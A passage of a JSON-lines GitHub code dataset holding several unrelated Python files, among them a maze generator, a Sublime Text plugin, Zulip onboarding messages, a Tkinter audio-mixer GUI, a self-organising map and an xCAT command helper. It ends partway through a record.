or quote\n self.assertEqual(expected, self.obj.preview)\n","repo_name":"oser-cs/oser-showcase-backend","sub_path":"project/tests/test_showcase_site/test_testimony.py","file_name":"test_testimony.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29975404720","text":"import random\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Maze:\r\n def __init__(self, width, height):\r\n self.width = width\r\n self.height = height\r\n self.grid = [[1 for _ in range(width)] for _ in range(height)]\r\n self.visited = [[False for _ in range(width)] for _ in range(height)]\r\n self.stack = []\r\n self.current_cell = (0, 0)\r\n self.directions = [(1, 0), (0, 1), (-1, 0), (0, -1)]\r\n\r\n def generate(self):\r\n self.visited[self.current_cell[0]][self.current_cell[1]] = True\r\n self.stack.append(self.current_cell)\r\n while self.stack:\r\n neighbors = []\r\n for direction in self.directions:\r\n x, y = self.current_cell[0] + direction[0], self.current_cell[1] + direction[1]\r\n if 0 <= x < self.height and 0 <= y < self.width and not self.visited[x][y]:\r\n neighbors.append((x, y))\r\n if neighbors:\r\n next_cell = random.choice(neighbors)\r\n self.visited[next_cell[0]][next_cell[1]] = True\r\n self.stack.append(next_cell)\r\n x1, y1 = self.current_cell\r\n x2, y2 = next_cell\r\n self.grid[(x1 + x2) // 2][(y1 + y2) // 2] = 0\r\n self.current_cell = next_cell\r\n else:\r\n self.current_cell = self.stack.pop()\r\n\r\n def show(self):\r\n plt.imshow(self.grid, cmap='gray')\r\n plt.show()\r\n\r\n# Example usage:\r\nmaze = Maze(20, 20)\r\nmaze.generate()\r\nmaze.show()\r\n","repo_name":"SiliconSavant/TerrainGenPy","sub_path":"mazegenerator.py","file_name":"mazegenerator.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30983861504","text":"\"\"\"Sublime Text plugin to remove a 
folder from a project easily.\"\"\"\n\nimport sublime\nimport sublime_plugin\n\n\nclass ProjectRemoveFolderCommand(sublime_plugin.TextCommand):\n \"\"\"The Sublime Text plugin class.\"\"\"\n\n project_folders = []\n\n def run(self, _):\n \"\"\"Main function which is called when the plugin is activated.\"\"\"\n\n self.project_folders = sublime.active_window().folders()\n\n if not self.project_folders:\n sublime.status_message('There are no folders added to the current window.')\n return\n\n sublime.active_window().show_quick_panel(self.project_folders, self.remove_folder)\n\n def remove_folder(self, folder_index):\n \"\"\"Function which removes the chosen folder from the window.\"\"\"\n\n if folder_index == -1:\n # No folder was chosen\n return\n\n project_data = sublime.active_window().project_data()\n if not project_data:\n sublime.status_message('There are no folders added to the current window.')\n return\n\n # Iterate over a copy of the list\n for folder in list(project_data.get('folders', [])):\n if folder.get('path') == self.project_folders[folder_index]:\n project_data['folders'].remove(folder)\n\n sublime.active_window().set_project_data(project_data)\n sublime.active_window().status_message('\"{}\" removed from project'.format(self.project_folders[folder_index]))\n","repo_name":"Tenzer/ProjectRemoveFolder","sub_path":"ProjectRemoveFolder.py","file_name":"ProjectRemoveFolder.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"506094182","text":"import csv\nimport matplotlib.pyplot as plt\nx = []\ny = []\ncount = 0\nwith open('cwnd_and_t.csv', 'rb') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',')\n for row in spamreader:\n if len(row) == 2 and len(row[0]) > 0 and len(row[1]) >0:\n x.append(int(row[0]))\n y.append(int(row[1]))\n\nplt.plot(range(len(y)), 
y)\n\nplt.show()\n","repo_name":"hellotommmy/cTCP","sub_path":"haha.py","file_name":"haha.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26191088599","text":"from multiprocessing.pool import ThreadPool\nfrom threading import Thread\n\nfrom promise import Promise\nfrom .utils import process\n\n# Necessary for static type checking\nif False: # flake8: noqa\n from typing import Any, Callable, List\n\n\nclass ThreadExecutor(object):\n\n pool = None\n\n def __init__(self, pool=False):\n # type: (bool) -> None\n self.threads = [] # type: List[Thread]\n if pool:\n self.execute = self.execute_in_pool\n self.pool = ThreadPool(processes=pool)\n else:\n self.execute = self.execute_in_thread\n\n def wait_until_finished(self):\n # type: () -> None\n while self.threads:\n threads = self.threads\n self.threads = []\n for thread in threads:\n thread.join()\n\n def clean(self):\n self.threads = []\n\n def execute_in_thread(self, fn, *args, **kwargs):\n # type: (Callable, *Any, **Any) -> Promise\n promise = Promise() # type: ignore\n thread = Thread(target=process, args=(promise, fn, args, kwargs))\n thread.start()\n self.threads.append(thread)\n return promise\n\n def execute_in_pool(self, fn, *args, **kwargs):\n promise = Promise()\n self.pool.map(lambda input: process(*input), [(promise, fn, args, kwargs)])\n return promise\n","repo_name":"graphql-python/graphql-core-legacy","sub_path":"graphql/execution/executors/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":377,"dataset":"github-code","pt":"18"} +{"seq_id":"43293064783","text":"# Exercício 035:\n\n# desenvolva um programa que leio o comprimento de três retas e diga ao usuário se elas podem\n# ou não formar um triângulo.\n\nr1 = float(input('Digite o comprimento da primeira reta:'))\nr2 = float(input('Digite o comprimento da segunda 
reta:'))\nr3 = float(input('Digite o comprimento da terceira reta:'))\nlista = [r1, r2, r3]\nlista_ordenada = sorted(lista)\nif lista_ordenada[0] + lista_ordenada[1] > lista_ordenada[2]:\n print(f'As retas {r1}, {r2} e {r3} conseguem formar um triângulo!')\nelse:\n print(f'As retas {r1}, {r2} e {r3} não conseguem formar um triângulo!')\n","repo_name":"edujsnogueira/Curso-Python-GG","sub_path":"CursoemVideoEx/ex035.py","file_name":"ex035.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40278925259","text":"import pytest\nfrom datetime import datetime\n\nfrom lswf.core.init import sql\nfrom lswf.database import db, File, Directory, SymLink\n\n\nfrom lswf.core.init import init_if_needed\ninit_if_needed()\n\n\ndef test_sym():\n sql('delete from symlink')\n o = SymLink(True, '/to/the', '/tmp/data/')\n db.create(o)\n assert sql('select * from symlink') == \\\n [(1, 1, '/to/the', '/tmp/data/')]\n\n\ndef test_dir():\n sql('delete from directory')\n d = datetime.now()\n o = Directory('/to/the', d, ['moon', 'stars'])\n db.create(o)\n assert sql('select path from directory') == [('/to/the',)]\n\n assert o.key == 1\n\n o.path = 'yo'\n print(o)\n db.update(o)\n assert sql('select path from directory') == [('yo',)]\n key = o.key\n o.key = None\n with pytest.raises(ValueError):\n db.delete(o)\n\n o.key = key\n db.delete(o)\n assert o.key is None\n assert sql('select * from directory') == []\n\n db.update_or_create(o)\n db.update_or_create(o)\n assert o.listdir == ['moon', 'stars']\n assert sql('select listdir from directory') == [('[\"moon\", \"stars\"]',)]\n o.listdir = []\n db.update_or_create(o)\n assert o.listdir == []\n assert sql('select listdir from directory') == [('[]',)]\n\n\ndef test_file():\n sql('delete from file')\n assert sql('select * from file') == []\n\n d = datetime.now()\n o = File('/to/the', d)\n db.create(o)\n assert sql('select path from file') == 
[('/to/the',)]\n\n assert o.key == 1\n\n o.path = 'yo'\n print(o)\n db.update(o)\n assert sql('select path from file') == [('yo',)]\n key = o.key\n o.key = None\n with pytest.raises(ValueError):\n db.delete(o)\n\n o.key = key\n db.delete(o)\n assert o.key is None\n assert sql('select * from file') == []\n\n db.update_or_create(o)\n db.update_or_create(o)\n o.path = 'pa'\n db.update_or_create(o)\n assert o.path == 'pa'\n o.key = None\n db.update_or_create(o)\n assert len(sql('select * from file')) == 1\n","repo_name":"Pythux/lswf","sub_path":"test/01_model_data_access.py","file_name":"01_model_data_access.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74793139238","text":"\nfrom django.conf import settings\n\nfrom zerver.lib.actions import set_default_streams, bulk_add_subscriptions, \\\n internal_prep_stream_message, internal_send_private_message, \\\n create_stream_if_needed, create_streams_if_needed, do_send_messages, \\\n do_add_reaction_legacy, create_users\nfrom zerver.models import Realm, UserProfile, Message, Reaction, get_system_bot\n\nfrom typing import Any, Dict, List, Mapping, Text\n\ndef setup_realm_internal_bots(realm: Realm) -> None:\n \"\"\"Create this realm's internal bots.\n\n This function is idempotent; it does nothing for a bot that\n already exists.\n \"\"\"\n internal_bots = [(bot['name'], bot['email_template'] % (settings.INTERNAL_BOT_DOMAIN,))\n for bot in settings.REALM_INTERNAL_BOTS]\n create_users(realm, internal_bots, bot_type=UserProfile.DEFAULT_BOT)\n bots = UserProfile.objects.filter(\n realm=realm,\n email__in=[bot_info[1] for bot_info in internal_bots],\n bot_owner__isnull=True\n )\n for bot in bots:\n bot.bot_owner = bot\n bot.save()\n\ndef send_initial_pms(user: UserProfile) -> None:\n organization_setup_text = \"\"\n if user.is_realm_admin:\n help_url = user.realm.uri + 
\"/help/getting-your-organization-started-with-zulip\"\n organization_setup_text = (\"* [阅读指南](%s) 进入团队 \"\n \"开始使用e建联\\n\" % (help_url,))\n\n content = (\n # \"Hello, and welcome to Zulip!\\n\\nThis is a private message from me, Welcome Bot. \"\n # \"Here are some tips to get you started:\\n\"\n # \"* Download our [Desktop and mobile apps](/apps)\\n\"\n # \"* Customize your account and notifications on your [Settings page](#settings)\\n\"\n # \"* Type `?` to check out Zulip's keyboard shortcuts\\n\"\n # \"%s\"\n # \"\\n\"\n # \"The most important shortcut is `r` to reply.\\n\\n\n # \"Practice sending a few messages by replying to this conversation. If you're not into \"\n # \"keyboards, that's okay too; clicking anywhere on this message will also do the trick!\") \\\n \"欢迎使用e建联!\\n\\n这是[欢迎机器人]发出的私信. \"\n \"这是引导您使用的秘诀:\\n\"\n \"* 去应用商店下载我们的[手机App](/apps)\\n\"\n \"* 去设置页定制您的通知方式\\n\"\n \"* 键`?` 呼出e建联快捷键\\n\"\n \"%s\"\n \"\\n\"\n \"最常用的快捷键用`r` 来回复消息.\\n\\n\"\n \"练练手吧,按`r`来回复本聊天对话.\"\n \"如果您不用键盘,没关系,点击本消息任何地方,能达到同样目的,即回复消息!\") \\\n % (organization_setup_text,)\n\n internal_send_private_message(user.realm, get_system_bot(settings.WELCOME_BOT),\n user, content)\n\ndef setup_initial_streams(realm: Realm) -> None:\n stream_dicts = [\n {'name': \"一般\"},\n {'name': \"新成员\",\n 'description': \"欢迎新成员. 
您可以用您的名字作为话题来介绍自己!\"},\n {'name': \"e建联\",\n 'description': \"e建联讨论、秘诀、提问题等等\"}] # type: List[Mapping[str, Any]]\n create_streams_if_needed(realm, stream_dicts)\n set_default_streams(realm, {stream['name']: {} for stream in stream_dicts})\n\ndef send_initial_realm_messages(realm: Realm) -> None:\n welcome_bot = get_system_bot(settings.WELCOME_BOT)\n # Make sure each stream created in the realm creation process has at least one message below\n # Order corresponds to the ordering of the streams on the left sidebar, to make the initial Home\n # view slightly less overwhelming\n welcome_messages = [\n {'stream': Realm.DEFAULT_NOTIFICATION_STREAM_NAME,\n 'topic': \"欢迎\",\n 'content': \"这是群组 `%s` 话题 `欢迎` 的消息. 我们使用这个群组 \"\n \"来放置系统生成的通知.\" % (Realm.DEFAULT_NOTIFICATION_STREAM_NAME,)},\n {'stream': Realm.INITIAL_PRIVATE_STREAM_NAME,\n 'topic': \"私有群组\",\n 'content': \"这是私有群组. 只有管理员和您邀请的人才能看见本群组的存在.\"},\n {'stream': \"会客厅\",\n 'topic': \"welcome\",\n 'content': \"Welcome to #**会客厅**.\"},\n {'stream': \"新成员\",\n 'topic': \"报到\",\n 'content': \"#**新成员** 群组,为新员工报到而设置.\\n\\n如果您不是这里的第一个人而读到本消息 \"\n \"请在用您的名字作为话题名来介绍自己! \"\n \"键入 `c` 或在屏幕下方点击 `新话题` 来开始新话题.\"},\n {'stream': \"e建联\",\n 'topic': \"话题演示\",\n 'content': \"这是一个话题里面的一条消息. 回复本消息将加入本话题.\"},\n {'stream': \"e建联\",\n 'topic': \"话题演示\",\n 'content': \"该话题第二条消息,带这[海龟](/static/images/cute/turtle.png)!\"},\n {'stream': \"e建联\",\n 'topic': \"第二个话题\",\n 'content': \"第二个话题的消息.\\n\\n 话题类似邮件的主题, \"\n \"明天沟通对话都围绕自己的话题. 话题宜短小,两三个词最好!\"},\n ] # type: List[Dict[str, Text]]\n messages = [internal_prep_stream_message(\n realm, welcome_bot,\n message['群组'], message['话题'], message['内容']) for message in welcome_messages]\n message_ids = do_send_messages(messages)\n\n # We find the one of our just-sent messages with turtle.png in it,\n # and react to it. 
This is a bit hacky, but works and is kinda a\n # 1-off thing.\n turtle_message = Message.objects.get(\n id__in=message_ids,\n subject='话题演示',\n content__icontains='cute/turtle.png')\n do_add_reaction_legacy(welcome_bot, turtle_message, 'turtle')\n","repo_name":"ty-xy/zg13","sub_path":"zerver/lib/onboarding.py","file_name":"onboarding.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18221912493","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nClasses and functions related to path structure\n\nCreated on Aug 18 2020\n\n@author: V.R.Marcelino\n\"\"\"\nfrom pathlib import Path\n\n# path to reference databases:\nclass ref_db():\n def __init__(self,blastdb_16Smicro=\"/home/ref_databases/BlastDBs/16SMicrobial/16SMicrobial\",\n blastdb_silva=\"/home/ref_databases/BlastDBs/16S_SILVA_132_NCBI.fna\"):\n\n self.blastdb_16Smicro = blastdb_16Smicro\n self.blastdb_silva = blastdb_silva\n\n\n# folder structure:\nclass amplicon_paths():\n def __init__(self, ab1_collec=\"/mnt/datastore/AMPLICON/AB1\",\n fasta_collec=\"/mnt/datastore/AMPLICON/FASTA\"):\n \n self.ab1_collec = ab1_collec\n self.fasta_collec = fasta_collec\n\n\nclass genome_paths():\n def __init__(self, raw_reads=\"/mnt/datastore/GENOMES/RAW\",\n paired=\"/mnt/datastore/GENOMES/PAIRED\",\n unpaired=\"/mnt/datastore/GENOMES/UNPAIRED\",\n contigs=\"/mnt/datastore/GENOMES/CONTIGS\",\n annotations=\"/mnt/datastore/GENOMES/ANNOTATIONS\"):\n self.raw_reads = raw_reads\n self.paired = paired\n self.unpaired = unpaired\n self.contigs = contigs\n self.annotations = annotations\n\n\n# make folders to store AUSMICC genomes and amplicons\n# similar names to what is found in mba\ndef make_db_folders():\n Path(\"/mnt/datastore/AMPLICON\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/AMPLICON/AB1\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/AMPLICON/FASTA\").mkdir(parents=True, 
exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/RAW\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/PAIRED\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/UNPAIRED\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/CONTIGS\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/ANNOTATIONS\").mkdir(parents=True, exist_ok=True)\n print (\"\\n Inexistent folders created. \\n\")\n\n\n","repo_name":"vrmarcelino/AusMiCC","sub_path":"ausmicc_scripts/path_structure.py","file_name":"path_structure.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12909996392","text":"import requests\nimport json\n\n\nid_currencie = ['GBPBRL', 'NOKBRL', 'BTCBRL', 'NZDBRL',\n 'CHFBRL', 'ETHBRL', 'DKKBRL', 'COPBRL',\n 'RUBBRL', 'CNYBRL', 'INRBRL', 'MXNBRL', \n 'PLNBRL', 'EURBRL', 'SARBRL', 'TRYBRL',\n 'PYGBRL', 'AEDBRL', 'HKDBRL', 'XRPBRL',\n 'USDBRL', 'CADBRL', 'JPYBRL', 'ILSBRL',\n 'SGDBRL', 'SEKBRL', 'THBBRL', 'PENBRL',\n 'DOGEBRL', 'TWDBRL', 'LTCBRL', 'AUDBRL', \n 'CLPBRL', 'BOBBRL', 'ARSBRL', 'UYUBRL']\n\ncurrencie = requests.get(\"http://economia.awesomeapi.com.br/json/last/GBP-BRL,NOK-BRL,BTC-BRL,NZD-BRL,CHF-BRL,ETH-BRL,DKK-BRL,COP-BRL,RUB-BRL,CNY-BRL,INR-BRL,MXN-BRL,PLN-BRL,EUR-BRL,SAR-BRL,TRY-BRL,PYG-BRL,AED-BRL,HKD-BRL,XRP-BRL,USD-BRL,CAD-BRL,JPY-BRL,ILS-BRL,SGD-BRL,SEK-BRL,THB-BRL,PEN-BRL,DOGE-BRL,TWD-BRL,LTC-BRL,AUD-BRL,CLP-BRL,BOB-BRL,ARS-BRL,UYU-BRL\")\ncurrencie_data = currencie.json()\n\nfor id in id_currencie:\n print(currencie_data[id], \"\\n\")\n","repo_name":"jeffbarreto1/finance-python","sub_path":"currencie.py","file_name":"currencie.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71078189801","text":"#! 
python3.6\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDocumentation de la classe PresentationTop\n\n Version : 17/04/2020 Équipe ROCCO\n\n\tParticipant:\tMaxence CONAN\n\t\t\t\t\tThibaud BARON\n\n Description :\n Présentation globale de la table de mixage.\n \n Attributs :\n controller : controller de la piste\n topPresentation : topPresentation où sera affichée la présentation de la piste\n \n volumeGlobalSlider : gestion du volume global à l'aide d'un slider\n soundButton : bouton gérant la pause du son\n addChannel : bouton gérant l'ajout de pistes\n saveButton : bouton gérant la sauvegarde les paramètres\n loadButton : bouton gérant le chargement des paramètres\n exportButton : bouton gérant l'exportation d'un fichier\n \n Constructeur :\n PresentationTop(controller, topPresentation)\n \n Méthodes :\n setVolumeGlobalValue(self,volumeValue) : Change la valeur du volume global\n setPlayPauseState(self,playState) : Change l'image du bouton\n modifyVolumeGlobalValue(self,val): Signale le changement de la valeur du volume global\n save_file(self): Signale le début d'une sauvegarde\n load_file(self): Signale le début d'une restauration\n export_file(self): Signale le début d'une exportation\n clickedSoundButton(self): Signale au controller de mute/unmute la piste et met à jour le bouton\n\"\"\"\n\nimport tkinter\nimport os.path\nfrom tkinter import *\n\nclass PresentationTop (Frame):\n\tdef __init__(self, controller, topPresentation):\n\t\tsuper().__init__(topPresentation)\n\t\tself.topPresentation = topPresentation\n\t\tself.controller = controller\n\t\t\n\t\t\n\t\tsoundOff=tkinter.PhotoImage(file=\"Images/pause.png\",master=self.topPresentation)\n\t\tself.soundButton = Button(self,image=soundOff, command = self.clickedSoundButton )\n\t\tself.soundButton.image = soundOff\n\t\tself.soundButtonState = False\n\t\t\n\t\tself.soundButton.pack()\n\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 2', height = 1 
)\n\t\tself.spacerLabel.pack()\n\t\t\n\t\tself.volumeGlobalSlider = Scale(self , orient=VERTICAL, command = self.modifyVolumeGlobalValue,background=\"white\", troughcolor='#C8C8C8' , activebackground=\"#D9D9D9\",font='Helvetica 12 bold',borderwidth=1 , cursor=\"hand2\" , highlightthickness=0 , width = 20, length = 150 , sliderlength = 40)\n\t\tself.volumeGlobalSlider.config(from_ = 100, to = 0)\n\t\tself.setVolumeGlobalValue(100)\n\t\tself.volumeGlobalSlider.pack()\n\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 8', height = 1 )\n\t\tself.spacerLabel.pack()\n\t\t\n\t\tself.addChannel = Button(self,text= \"Ajouter une piste\", command=self.controller.addPiste,width=22, height = 2,cursor=\"hand2\", background='#C8C8C8',font=\"Helvetica 12 bold\", activebackground = \"#B9B9B9\")\n\t\tself.addChannel.pack()\n\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 6', height = 1 )\n\t\tself.spacerLabel.pack()\n\t\t\n\t\tself.saveButton = Button(self,text= \"Sauvegarder les\\nparamètres\",command=self.save_file,width=22 , height = 2 ,cursor=\"hand2\", background='#C8C8C8',font=\"Helvetica 12 bold\", activebackground = \"#B9B9B9\")\n\t\tself.saveButton.pack()\n\t\t\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 1', height = 1 )\n\t\tself.spacerLabel.pack()\n\n\t\tself.loadButton = Button(self,text= \"Charger de\\nparamètres\",command=self.load_file,width=22 , height = 2 , cursor=\"hand2\", background='#C8C8C8',font=\"Helvetica 12 bold\", activebackground = \"#B9B9B9\")\n\t\tself.loadButton.pack()\n\t\t\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 6', height = 1 )\n\t\tself.spacerLabel.pack()\n\n\t\tself.exportButton = Button(self,text = \"Exporter\",command=self.export_file,width=22 , height = 2,cursor=\"hand2\", background='#C8C8C8',font=\"Helvetica 12 bold\", activebackground = 
\"#B9B9B9\")\n\t\tself.exportButton.pack()\n\t\t\n\t\tself.configure(background=\"#FFF\")\n\t\tself.pack(side = LEFT)\n\t\t\n\t\t\n\tdef setVolumeGlobalValue(self,volumeValue) : \n\t\t\"\"\"\n Paramètre(s)\n\t\t-------------\n\t\tvolumeValue : float Valeur du volume de la piste.\n\n\t\t\"\"\"\n\t\tself.volumeGlobalSlider.set(volumeValue)\n\t\t\n\t\t\n\tdef setPlayPauseState(self,playState) : \n\t\t\"\"\"\n Paramètre(s)\n\t\t-------------\n\t\tplayState : boolean état de l'image\n\n\t\t\"\"\"\n\t\tif playState:\n\t\t\tsoundOn=tkinter.PhotoImage(file=\"Images/play.png\",master=self.topPresentation)\n\t\t\tself.soundButton.config(image=soundOn)\n\t\t\tself.soundButton.image = soundOn\n\t\t\tself.soundButtonState = True\n\t\telse:\n\t\t\tsoundOff=tkinter.PhotoImage(file=\"Images/pause.png\",master=self.topPresentation)\n\t\t\tself.soundButton.config(image=soundOff)\n\t\t\tself.soundButton.image = soundOff\n\t\t\tself.soundButtonState = False\n\t\t\n\t\"\"\"\n\t----------------------------Signal-----------------------------------------\n\t\"\"\"\n\t\n\tdef modifyVolumeGlobalValue(self,val):\n\t\tself.controller.listenerVolumeGeneral(int(val))\n\t\t\n\tdef save_file(self):\n\t\tself.controller.listenerSave()\n\n\tdef load_file(self):\n\t\tself.controller.listenerLoad()\n\n\tdef export_file(self):\n\t\tself.controller.listenerExport()\n\n\tdef clickedSoundButton(self):\n\t\tif self.soundButtonState:\n\t\t\tsoundOff=tkinter.PhotoImage(file=\"Images/pause.png\",master=self.topPresentation)\n\t\t\tself.soundButton.config(image=soundOff)\n\t\t\tself.soundButton.image = soundOff\n\t\t\tself.soundButtonState = False\n\t\telse:\n\t\t\tsoundOn=tkinter.PhotoImage(file=\"Images/play.png\",master=self.topPresentation)\n\t\t\tself.soundButton.config(image=soundOn)\n\t\t\tself.soundButton.image = soundOn\n\t\t\tself.soundButtonState = 
True\n\t\tself.controller.listenerPlay(self.soundButtonState)\n","repo_name":"NMingoube/projets-fac","sub_path":"Barbamix/PresentationTop.py","file_name":"PresentationTop.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29073789269","text":"import random\nimport math\n\nclass Node:\n def __init__(self,w):\n self.etiquet = \"*\"\n # self.activ = 0\n self.w = w\n\nclass Bmu:\n def __init__(self,i,j):\n self.ligne = i\n self.colonne = j\n\nclass Network:\n def __init__(self,map_row,map_col,donne_size,moyenne,delai):\n self.col = map_col\n self.row = map_row\n self.size = donne_size\n self.maps = self.set_maps(moyenne,delai)\n self.bmu = []\n\n def set_maps(self,moyenne,delai):\n tab = []\n maps = []\n for i in range(self.row):\n for j in range(self.col): \n for k in range(self.size):\n tab.append(random.uniform(float(moyenne[k])-delai, float(moyenne[k]+delai))) \n maps.append(Node(tab))\n tab = []\n return maps\n\n def get_index(self,index):\n i = int(index/self.col)\n j = index - i*self.col\n return Bmu(i,j)\n\n def get_maps(self,i,j):\n return self.maps[i*self.col +j]\n\n def affiche_network(self):\n s = 0\n g = 0\n o = 0\n for i in range(self.row):\n for j in range(self.col):\n if self.get_maps(i,j).etiquet == \"s\":\n print(\"\\33[31m\",self.get_maps(i,j).etiquet+\"\\33[37m\" ,end=\" \")\n s = s+1\n if self.get_maps(i,j).etiquet == \"g\":\n print(\"\\33[32m\",self.get_maps(i,j).etiquet+\"\\33[37m\" ,end=\" \")\n g = g+1\n if self.get_maps(i,j).etiquet == \"o\":\n print(\"\\33[33m\",self.get_maps(i,j).etiquet+\"\\33[37m\" ,end=\" \")\n o = o+1\n if self.get_maps(i,j).etiquet == \"*\":\n print(\"\\33[37m\",self.get_maps(i,j).etiquet+\"\\33[37m\" ,end=\" \")\n print()\n print(\"\\33[31m s for Iris-versicolor : \",s,\"\\33[37m\")\n print(\"\\33[32m g for Iris-virginica : \",g,\"\\33[37m\")\n print(\"\\33[33m o for Iris-setosa : \",o,\"\\33[37m\")\n \n\n def 
distance_vect(self,tab1,tab2):\n distance = 0.0\n for i in range(self.size):\n distance = distance + math.pow((tab1[i]-tab2[i]),2)\n return math.sqrt(distance)\n\n def trouve_bmu(self,vect):\n min = 100.0\n for index in range(len(self.maps)):\n distance = self.distance_vect(vect.x,self.maps[index].w)\n if distance == min:\n bmu.append(self.get_index(index))\n if distance < min:\n bmu = []\n bmu.append(self.get_index(index))\n min = distance\n return bmu\n\n def aleatoir_bmu(self,bmu):\n return bmu[random.randint(0,len(bmu)-1)]\n\n def change_etiquet(self,bmu,vect):\n self.get_maps(bmu.ligne,bmu.colonne).etiquet = vect.id[8]\n \n def modifier_poids(self,vect,bmu,alpha,rayon):\n for i in range(max(0,bmu.ligne-rayon),min(bmu.ligne+rayon,self.row-1)+1):\n for j in range(max(0,bmu.colonne-rayon),min(bmu.colonne+rayon,self.col-1)+1):\n for k in range(self.size):\n self.get_maps(i,j).w[k] = self.get_maps(i,j).w[k] + alpha * (vect.x[k] -self.get_maps(i,j).w[k])\n\n def apprentisage(self,base,iteration,alpha_initial):\n rayon = 3\n partie = int(iteration/rayon)\n for t in range(iteration):\n alpha = alpha_initial * (1 - (t/iteration))\n random.shuffle(base.vect)\n for vect in base.vect:\n bmu = self.aleatoir_bmu(self.trouve_bmu(vect))\n self.change_etiquet(bmu,vect)\n self.modifier_poids(vect,bmu,alpha,rayon)\n if t == partie:\n rayon = 2\n if t == 2*partie:\n rayon = 1\n \n\n \n\n\n \n\n","repo_name":"alihaydar8/SOM_py","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32013292321","text":"#!/usr/bin/python\n\nimport datetime\nimport six\nimport subprocess\nimport traceback\n\nREADONLY_CMDS = ['lsdef', 'tabdump']\n\n\nclass XCATPlayException(Exception):\n \"\"\"Base xcat play Exception\n\n To correctly use this class, inherit from it and define\n a '_msg_fmt' property. 
That message will get printf'd\n with the keyword arguments provided to the constructor.\n\n If you need to access the message from an exception you should use\n six.text_type(exc)\n\n \"\"\"\n _msg_fmt = \"An unknown exception occurred.\"\n\n def __init__(self, message=None, **kwargs):\n self.kwargs = kwargs\n\n if not message:\n # Check if class is using deprecated 'message' attribute.\n if (hasattr(self, 'message') and self.message):\n self._msg_fmt = self.message\n\n try:\n message = self._msg_fmt % kwargs\n\n except Exception as e:\n message = self._msg_fmt\n\n super(XCATPlayException, self).__init__(message)\n\n def __str__(self):\n \"\"\"Encode to utf-8 then wsme api can consume it as well.\"\"\"\n if not six.PY3:\n return unicode(self.args[0]).encode('utf-8')\n\n return self.args[0]\n\n def __unicode__(self):\n \"\"\"Return a unicode representation of the exception message.\"\"\"\n return unicode(self.args[0])\n\n\ndef _execute_command(cmd, **kwargs):\n if not kwargs.get('stdin'):\n kwargs['stdin'] = subprocess.PIPE\n if not kwargs.get('stdout'):\n kwargs['stdout'] = subprocess.PIPE\n if not kwargs.get('stderr'):\n kwargs['stderr'] = subprocess.PIPE\n try:\n pobj = subprocess.Popen(cmd, **kwargs)\n (out, err) = pobj.communicate()\n rc = pobj.returncode\n return (rc, out, err)\n except subprocess.CalledProcessError:\n if kwargs['shell']:\n raise XCATPlayException(cmd=cmd)\n else:\n raise XCATPlayException(cmd=' '.join(cmd))\n\n\nclass XCATWorker(object):\n def __init__(self, module):\n self.module = module\n self.params = module.params\n self.rc = None\n self.changed = True\n\n def _parse_command_options(self, map):\n if map is None:\n return ''\n options = []\n for k, v in six.iteritems(map):\n options.append(k)\n options.append(v)\n return ' '.join(options)\n\n def _parse_command_args(self, args):\n return ' '.join(args) if args is not None else ''\n\n def _exec_xcat_cmd(self):\n result = dict()\n cmd = [self.params['command'],\n 
